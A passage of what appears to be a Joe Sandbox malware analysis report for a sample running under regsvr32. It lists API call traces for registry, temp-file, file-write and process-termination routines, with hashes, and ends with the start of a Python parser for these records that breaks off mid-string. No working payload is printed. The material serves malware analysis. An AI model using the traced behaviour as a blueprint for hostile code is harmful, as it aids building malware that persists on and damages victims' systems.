                  • Part of subcall function 04BCBC31: RegQueryValueExA.ADVAPI32(?,04BDE5BD,00000000,04BDE5BD,00000000,04BD6019,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?), ref: 04BCBC97
                  • Part of subcall function 04BCBC31: RegCloseKey.ADVAPI32(?,?,04BD6019,00000000,04BDE5BD,?,?,?,04BDE5BD,?,?,?,00000000,?,?,?), ref: 04BCBCC1
                • GetCurrentThreadId.KERNEL32 ref: 04BCC6BB
                • GetCurrentThread.KERNEL32 ref: 04BCC6CE
                • RtlEnterCriticalSection.NTDLL(0624C0A0), ref: 04BCC775
                • Sleep.KERNEL32(0000000A), ref: 04BCC77F
                • RtlLeaveCriticalSection.NTDLL(0624C0A0), ref: 04BCC7A5
                • HeapFree.KERNEL32(00000000,?), ref: 04BCC7D3
                • HeapFree.KERNEL32(00000000,00000018), ref: 04BCC7E6
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                • String ID:
                • API String ID: 1146182784-0
                • Opcode ID: 79454d804facecc36b3b5217a91ef469270627e8c632b772339949b510d72ae8
                • Instruction ID: 26547f429965bd662afea8e5094fa45332a4a8f59aeb7340dcf7c5d39a8c18ed
                • Opcode Fuzzy Hash: 79454d804facecc36b3b5217a91ef469270627e8c632b772339949b510d72ae8
                • Instruction Fuzzy Hash: 7251F4B5504601AFE750DF29D8C481ABBF8FB99344F00496FF589DB211E735ED488BA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BD20E3: RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BD20EB
                  • Part of subcall function 04BD20E3: RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BD2100
                  • Part of subcall function 04BD20E3: InterlockedIncrement.KERNEL32(0000001C), ref: 04BD2119
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04BE2D69
                • lstrlen.KERNEL32(00000008,?,?,?,04BC110F,00000000,00000000,-00000008,?,?), ref: 04BE2D78
                • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 04BE2D8A
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,04BC110F,00000000,00000000,-00000008,?,?), ref: 04BE2D9A
                • memcpy.NTDLL(00000000,?,?,?,?,?,04BC110F,00000000,00000000,-00000008,?,?), ref: 04BE2DAC
                • lstrcpy.KERNEL32(00000020), ref: 04BE2DDE
                • RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BE2DEA
                • RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BE2E42
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 3746371830-0
                • Opcode ID: 085a9ffd749f8b27cac5cbd1c6775b196c67883a7712f04d754726c9841fbf5e
                • Instruction ID: 2c55399ac3cf5b6dfc9afc497e2ec6f34003eb19003349baa1d51c1cabd9b0a0
                • Opcode Fuzzy Hash: 085a9ffd749f8b27cac5cbd1c6775b196c67883a7712f04d754726c9841fbf5e
                • Instruction Fuzzy Hash: 2E41CF71500715EFEB219F2AD844B6ABBF8FF88715F00849AE8099B241E775ED50DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,04BE4FFC), ref: 04BE373F
                • GetLastError.KERNEL32 ref: 04BE3749
                • WaitForSingleObject.KERNEL32(000000C8), ref: 04BE376E
                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BE378F
                • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 04BE37B7
                • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 04BE37CC
                • SetEndOfFile.KERNEL32(00000006), ref: 04BE37D9
                • GetLastError.KERNEL32 ref: 04BE37E5
                • CloseHandle.KERNEL32(00000006), ref: 04BE37F1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                • String ID:
                • API String ID: 2864405449-0
                • Opcode ID: bdd62fec39d94c1e87499bcffa3f5439139f0ca81c122593691be4c2a704da60
                • Instruction ID: feb5e8598c08f5e27330264d88c9849eb8a56cffd062501a708b07cdd4e02a91
                • Opcode Fuzzy Hash: bdd62fec39d94c1e87499bcffa3f5439139f0ca81c122593691be4c2a704da60
                • Instruction Fuzzy Hash: F1316BB1900208BBEB119FA6DD49FAE7BB9EB84315F204195F911EB090D3789E50DB21
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,04BDE92B,00000000,74E5F5B0,04BD47CC,?,00000001), ref: 04BDECB7
                • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 04BDECCD
                • _snwprintf.NTDLL ref: 04BDECF2
                • CreateFileMappingW.KERNEL32(000000FF,04BEE268,00000004,00000000,00001000,?), ref: 04BDED0E
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04BDED20
                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 04BDED37
                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 04BDED58
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 04BDED60
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                • String ID:
                • API String ID: 1814172918-0
                • Opcode ID: ed3ce243f5ecb3d712f5b893763f3421c2fc4cc446d5d900b723e050d2ee5194
                • Instruction ID: 0d1461507b5d37952916beb2ab5fc79755de77c1bbd4bb97d020ff7850df6e8f
                • Opcode Fuzzy Hash: ed3ce243f5ecb3d712f5b893763f3421c2fc4cc446d5d900b723e050d2ee5194
                • Instruction Fuzzy Hash: 4B21F376640608BBD721AB69DC04F9D77A9EB84710F2100A2F606EF190EB70E9009B70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BC7A3C: InterlockedIncrement.KERNEL32(?), ref: 04BC7A8D
                  • Part of subcall function 04BC7A3C: RtlLeaveCriticalSection.NTDLL(0624C148), ref: 04BC7B18
                • OpenProcess.KERNEL32(00000410,?,?,?,00000000,?,0000001C), ref: 04BCED64
                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,00000000,?,0000001C), ref: 04BCED82
                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BCEDE8
                • lstrlenW.KERNEL32(?), ref: 04BCEE5D
                • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 04BCEE79
                • memcpy.NTDLL(00000014,?,00000002), ref: 04BCEE91
                  • Part of subcall function 04BC56F4: RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BC5771
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                • String ID: o
                • API String ID: 2541713525-252678980
                • Opcode ID: aa0ff6fd40ac9688f18c0f70b16460bbbd612a0b7f7832a605530298481daf94
                • Instruction ID: 75567787feda8396f8a953e213a6071bb717a633bd1ecadec3617c3962d8ffee
                • Opcode Fuzzy Hash: aa0ff6fd40ac9688f18c0f70b16460bbbd612a0b7f7832a605530298481daf94
                • Instruction Fuzzy Hash: 1E517D71640706EFEB20DF65C8C8BA6B7A8FF04744F0449ADE9459B150E7B4F984CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,04BD219F,?,?,?,?), ref: 04BD8ED4
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BD8EE6
                • wcstombs.NTDLL ref: 04BD8EF4
                • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,04BD219F,?,?,?), ref: 04BD8F18
                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04BD8F2D
                • mbstowcs.NTDLL ref: 04BD8F3A
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,04BD219F,?,?,?,?,?), ref: 04BD8F4C
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,04BD219F,?,?,?,?,?), ref: 04BD8F66
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                • String ID:
                • API String ID: 316328430-0
                • Opcode ID: bb3c07d2ecaa92210128e64ae2655a1ab380ebe72aa080dc7b6abb7e74b4201b
                • Instruction ID: b01f0d9b16fcbdae3626df45babfe04ab9327a85f959a32f5a6486611aab6095
                • Opcode Fuzzy Hash: bb3c07d2ecaa92210128e64ae2655a1ab380ebe72aa080dc7b6abb7e74b4201b
                • Instruction Fuzzy Hash: CE216A3150020AFFDF10AFA2DC09F9A7FB9EB84301F1045A6BA14A7061D7359E54DB70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedIncrement.KERNEL32(04BEE0EC), ref: 04BDAF4B
                • lstrcpy.KERNEL32(00000000), ref: 04BDAF87
                  • Part of subcall function 04BC1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,04BDDB18,?,?,00000000,04BCC692,?,?,?,?,00000000,?), ref: 04BC1B99
                  • Part of subcall function 04BC1B8A: mbstowcs.NTDLL ref: 04BC1BB5
                • GetLastError.KERNEL32(00000000), ref: 04BDB016
                • HeapFree.KERNEL32(00000000,?), ref: 04BDB02D
                • InterlockedDecrement.KERNEL32(04BEE0EC), ref: 04BDB044
                • DeleteFileA.KERNEL32(00000000), ref: 04BDB065
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BDB075
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                  • Part of subcall function 04BD0D54: GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                  • Part of subcall function 04BD0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                  • Part of subcall function 04BD0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                  • Part of subcall function 04BD0D54: lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                • String ID:
                • API String ID: 908044853-0
                • Opcode ID: 575d6c4b3707abf96bec34c02aa76fb28954830100899eecd85062413eac4504
                • Instruction ID: 8ed510b50daf50e2e63b4a858d1377241b578fb27384c82867240c5754dd9676
                • Opcode Fuzzy Hash: 575d6c4b3707abf96bec34c02aa76fb28954830100899eecd85062413eac4504
                • Instruction Fuzzy Hash: A741D8B2C00608BBDB117A7598847AD7BB5DB98355F0240E1EF119B212F739AD039762
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlImageNtHeader.NTDLL ref: 04BCAC2E
                • RtlEnterCriticalSection.NTDLL(00000000), ref: 04BCAC71
                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 04BCAC8C
                • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 04BCACE2
                • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 04BCAD3D
                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 04BCAD4B
                • RtlLeaveCriticalSection.NTDLL(00000000), ref: 04BCAD56
                  • Part of subcall function 04BC2237: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 04BC224B
                  • Part of subcall function 04BC2237: memcpy.NTDLL(00000000,04BD153B,?,?,-00000005,?,04BD153B,00000001,00000000,-00000005,00000001), ref: 04BC2274
                  • Part of subcall function 04BC2237: RegCloseKey.ADVAPI32(?,?,04BD153B,00000001,00000000,-00000005,00000001), ref: 04BC22C8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
                • String ID:
                • API String ID: 2070110485-0
                • Opcode ID: ec9493cd53fbc7e472e14438cd756d7fa86cf579519d7c3e35410efdaef6a558
                • Instruction ID: 6bd0fc2e2c98280a221ce64258d65d73895b2d3a53d88b4532f6beef03d77814
                • Opcode Fuzzy Hash: ec9493cd53fbc7e472e14438cd756d7fa86cf579519d7c3e35410efdaef6a558
                • Instruction Fuzzy Hash: 11416E72200209ABEF219F66DC88F6B37ADEF88746F0400A9F905DB151DB74ED51EA70
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedIncrement.KERNEL32(04BEE0EC), ref: 04BDAF4B
                • lstrcpy.KERNEL32(00000000), ref: 04BDAF87
                  • Part of subcall function 04BC1B8A: lstrlen.KERNEL32(?,00000008,00000000,?,00000000,04BDDB18,?,?,00000000,04BCC692,?,?,?,?,00000000,?), ref: 04BC1B99
                  • Part of subcall function 04BC1B8A: mbstowcs.NTDLL ref: 04BC1BB5
                • GetLastError.KERNEL32(00000000), ref: 04BDB016
                • HeapFree.KERNEL32(00000000,?), ref: 04BDB02D
                • InterlockedDecrement.KERNEL32(04BEE0EC), ref: 04BDB044
                • DeleteFileA.KERNEL32(00000000), ref: 04BDB065
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BDB075
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                  • Part of subcall function 04BD0D54: GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                  • Part of subcall function 04BD0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                  • Part of subcall function 04BD0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                  • Part of subcall function 04BD0D54: lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
                • String ID:
                • API String ID: 908044853-0
                • Opcode ID: 620e5531ac5d5626b712bbf03b32ef1a16eebe2dfb44630246b644034ea60a39
                • Instruction ID: 0a35f5c6fb41b88714c1f3eda38f5db535ecade53cf885fdd7584c5eed2d8e4f
                • Opcode Fuzzy Hash: 620e5531ac5d5626b712bbf03b32ef1a16eebe2dfb44630246b644034ea60a39
                • Instruction Fuzzy Hash: 58310532900514EBDB21AFB2C888AAD7BB4EB88744F1140E6F914EB151E774FE41DBB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D66
                  • Part of subcall function 04BD0D54: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D7F
                  • Part of subcall function 04BD0D54: GetCurrentThreadId.KERNEL32 ref: 04BD0D8C
                  • Part of subcall function 04BD0D54: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0D98
                  • Part of subcall function 04BD0D54: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04BC9A74,00000000,?,00000000,00000000,?), ref: 04BD0DA6
                  • Part of subcall function 04BD0D54: lstrcpy.KERNEL32(00000000), ref: 04BD0DC8
                • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 04BCDEB5
                • StrTrimA.SHLWAPI(?,?), ref: 04BCDED3
                • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 04BCDF3C
                • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 04BCDF5D
                • DeleteFileA.KERNEL32(?,00003219), ref: 04BCDF7F
                • HeapFree.KERNEL32(00000000,?), ref: 04BCDF8E
                • HeapFree.KERNEL32(00000000,?,00003219), ref: 04BCDFA6
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 1078934163-0
                • Opcode ID: e0a352ba2c0b7a7f276aaeaac6e35f1a19d1bc6b5b3136707581659a51ef30d1
                • Instruction ID: 76400475fe61188a2433f089a232c4b36c0657af2f543a32ad88072fb668ef72
                • Opcode Fuzzy Hash: e0a352ba2c0b7a7f276aaeaac6e35f1a19d1bc6b5b3136707581659a51ef30d1
                • Instruction Fuzzy Hash: E7318F3220420AAFE711EF65DC84F6A77ADFB84704F0504AAF944EB191D765ED058BB2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,04BDF266,00000000), ref: 04BCC4CD
                • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 04BCC4E2
                • memset.NTDLL ref: 04BCC4EF
                • HeapFree.KERNEL32(00000000,00000000,?,04BDF265,?,?,00000000,?,00000000,04BCFB8A,?,00000000), ref: 04BCC50C
                • memcpy.NTDLL(?,?,04BDF265,?,04BDF265,?,?,00000000,?,00000000,04BCFB8A,?,00000000), ref: 04BCC52D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Allocate$Freememcpymemset
                • String ID: chun
                • API String ID: 2362494589-3058818181
                • Opcode ID: 69045a43ae17380449037a3c888f2ef47cba0303ef39076b3b88721887dc5a3e
                • Instruction ID: bfedf5915a4e5a7b7d71f8ac005659845f8bb15be8029b3e1015dbf43542bd93
                • Opcode Fuzzy Hash: 69045a43ae17380449037a3c888f2ef47cba0303ef39076b3b88721887dc5a3e
                • Instruction Fuzzy Hash: D3316071600706AFD720DF66D885A16BBF8EF98314F01446AE949CB621D770F905DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(04BE42B9,00000000,04BEE4A0,04BEE4C0,?,?,04BE42B9,04BD26E1,04BEE4A0), ref: 04BDB665
                • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04BDB67B
                • lstrlen.KERNEL32(04BD26E1,?,?,04BE42B9,04BD26E1,04BEE4A0), ref: 04BDB683
                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04BDB68F
                • lstrcpy.KERNEL32(04BEE4A0,04BE42B9), ref: 04BDB6A5
                • HeapFree.KERNEL32(00000000,00000000,?,?,04BE42B9,04BD26E1,04BEE4A0), ref: 04BDB6F9
                • HeapFree.KERNEL32(00000000,04BEE4A0,?,?,04BE42B9,04BD26E1,04BEE4A0), ref: 04BDB708
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlen$lstrcpy
                • String ID:
                • API String ID: 1531811622-0
                • Opcode ID: 1c26c20c2b200a7f7f01197225d6b3f70d47788814bd0cb6950b7c300cd66609
                • Instruction ID: 59663640e97d7edc6423d8a6b046b500054d581f2a892900a8c1f3c039a91e7e
                • Opcode Fuzzy Hash: 1c26c20c2b200a7f7f01197225d6b3f70d47788814bd0cb6950b7c300cd66609
                • Instruction Fuzzy Hash: D621F231508244AFEB229F76DC44F66BFAAEBCA750F0540AAE8449B212D775EC06D770
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BC45AA: lstrlen.KERNEL32(00000000,00000000,7691C740,74E481D0,?,?,?,04BC64BB,?,00000000,74E481D0,?,?,04BD09CA,00000000,0624C0E0), ref: 04BC4611
                  • Part of subcall function 04BC45AA: sprintf.NTDLL ref: 04BC4632
                • lstrlen.KERNEL32(00000000,7691C740,?,00000000,74E481D0,?,?,04BD09CA,00000000,0624C0E0), ref: 04BC64CD
                • lstrlen.KERNEL32(?,?,?,04BD09CA,00000000,0624C0E0), ref: 04BC64D5
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • strcpy.NTDLL ref: 04BC64EC
                • lstrcat.KERNEL32(00000000,?), ref: 04BC64F7
                  • Part of subcall function 04BD4E2F: lstrlen.KERNEL32(?,?,?,00000000,?,04BC6506,00000000,?,?,?,04BD09CA,00000000,0624C0E0), ref: 04BD4E40
                  • Part of subcall function 04BC57E0: RtlFreeHeap.NTDLL(00000000,?,04BC222D,?,?,?,?,?,?,?,?,04BC1089,?,?,?), ref: 04BC57EC
                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04BD09CA,00000000,0624C0E0), ref: 04BC6514
                  • Part of subcall function 04BD91FF: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04BC6520,00000000,?,?,04BD09CA,00000000,0624C0E0), ref: 04BD9209
                  • Part of subcall function 04BD91FF: _snprintf.NTDLL ref: 04BD9267
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                • String ID: =
                • API String ID: 2864389247-1428090586
                • Opcode ID: 1c4c529260e3b6e63363e6bc4da71c276d5c382f7fbd892be78657009b7b973b
                • Instruction ID: 206bf1d7cf32a43c7aa4de2f8ee09f13bdd251b1dc964d91cad8cac3a4b85ff0
                • Opcode Fuzzy Hash: 1c4c529260e3b6e63363e6bc4da71c276d5c382f7fbd892be78657009b7b973b
                • Instruction Fuzzy Hash: 7111A3339016297B97227B799CC8C7F37ADDE8865431540DAF904AB201DE78FE0157B1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SwitchToThread.KERNEL32(?,?,04BCE039), ref: 04BC65AF
                • CloseHandle.KERNEL32(?,?,04BCE039), ref: 04BC65BB
                • CloseHandle.KERNEL32(00000000,74E5F720,?,04BC6113,00000000,?,?,?,04BCE039), ref: 04BC65CD
                • memset.NTDLL ref: 04BC65E4
                • memset.NTDLL ref: 04BC65FB
                • memset.NTDLL ref: 04BC6612
                • memset.NTDLL ref: 04BC6629
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memset$CloseHandle$SwitchThread
                • String ID:
                • API String ID: 3699883640-0
                • Opcode ID: 85ba1c8074ff230fd1f392e13ef5783354c9c25d6367ee427999ed8ee1c2d7e2
                • Instruction ID: 6fac963b3365eaf2e90b993c222fb82112007411e83a842d9340702860dd0e0d
                • Opcode Fuzzy Hash: 85ba1c8074ff230fd1f392e13ef5783354c9c25d6367ee427999ed8ee1c2d7e2
                • Instruction Fuzzy Hash: 11118F319019207BE5223B2BEC88D6B7B6CEFD6714F0400BAF104AB545D768FE0496FA
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BD4FEF
                • wcstombs.NTDLL ref: 04BD5000
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(04BEE21C,0000002E,00000000,00000000,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFF9D
                  • Part of subcall function 04BCFF8B: StrChrA.SHLWAPI(00000004,00000020,?,04BEE21C,04BD739D,00000000,00000000,00000000), ref: 04BCFFAC
                • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 04BD5021
                • TerminateProcess.KERNEL32(00000000,00000000), ref: 04BD5030
                • CloseHandle.KERNEL32(00000000), ref: 04BD5037
                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04BD5046
                • WaitForSingleObject.KERNEL32(00000000), ref: 04BD5056
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                • String ID:
                • API String ID: 417118235-0
                • Opcode ID: 97e9c98c66701a19c2218b894d80affcff29bc6da72ed8ec797cb618fd20b995
                • Instruction ID: 45604f5426b04c074b037fc9c115003b922c153d8e72c55ab064aca5fbd8a39e
                • Opcode Fuzzy Hash: 97e9c98c66701a19c2218b894d80affcff29bc6da72ed8ec797cb618fd20b995
                • Instruction Fuzzy Hash: 0711B231100A16BBE730AF66DC48F6A7B68FB44751F040091F905AB181D7B9ED54CBF0
                Uniqueness

                Uniqueness Score: -1.00%
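The records in this report print every call's raw stack slots in hex, so the access masks and flags that tell you what a routine actually does (PROCESS_TERMINATE on the OpenProcess above, FILE_END on the SetFilePointer earlier, PAGE_READWRITE on the CreateFileMappingW) have to be decoded by hand. The following is an added example, not Joe Sandbox code and not part of the original report: a small parser for the "APIs" lines in this format that decodes the parameters whose meaning is fixed by the documented Win32 prototype, and a triage pass over the call set of a record. The sample input is constructed from lines copied out of several records on this page; the constant tables are standard Win32 values; the parameter positions follow the documented prototypes; the triage predicates are my own heuristics. The report lists more stack slots than a call has real parameters (CloseHandle appears with up to sixteen), so only slots within the prototype are decoded and the rest are echoed as-is.

```python
"""Parse Joe Sandbox per-function API lines and decode well-known arguments.

Added example for this page; not Joe Sandbox code.  Decoding tables are
standard Win32 constants.  Parameter indexes follow the documented
prototypes; slots past the prototype (the report prints extra stack
values) are left as raw hex.
"""
import re

# Constructed sample: lines copied from several records of this report.
SAMPLE = """\
• CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008), ref: 04BE373F
• GetLastError.KERNEL32 ref: 04BE3749
• SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 04BE37B7
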